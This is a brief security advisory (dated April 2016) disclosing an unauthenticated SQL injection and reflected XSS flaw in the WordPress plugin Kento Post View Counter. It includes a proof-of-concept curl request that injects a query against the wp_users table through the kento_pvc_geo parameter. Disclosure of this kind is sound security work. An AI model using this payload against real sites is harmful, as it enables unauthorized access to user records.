Kento Post View Counter [SQL Injection]

Description

WordPress plugin Kento Post View Counter Plugin is vulnerable to SQL Injection attacks.

The plugin registers an AJAX action kento_pvc_top_geo which is available to not registered users also. This action calls the kento_pvc_top_geo() function which performs SQL queries without sanitizing input or escaping output.

Vulnerable param is $_POST['kento_pvc_geo'] and it can be exploited for SQL injection or Reflected XSS attacks (DWF-2016-87022).

PoC

SQL Injection Attack

curl -XPOST 'http://wp1.dev/wp-admin/admin-ajax.php' \
    -d 'action=kento_pvc_top_geo
    &kento_pvc_geo= * from wp_users where ID=1 or sleep(1); --'

---

WordPress Plugins SQL Injection

---

INFO

• 19 April 2016
• Pan Vag
• kentothemes.com
• Kento Post View Counter
• WordPress 4.5
• DWF-2016-87021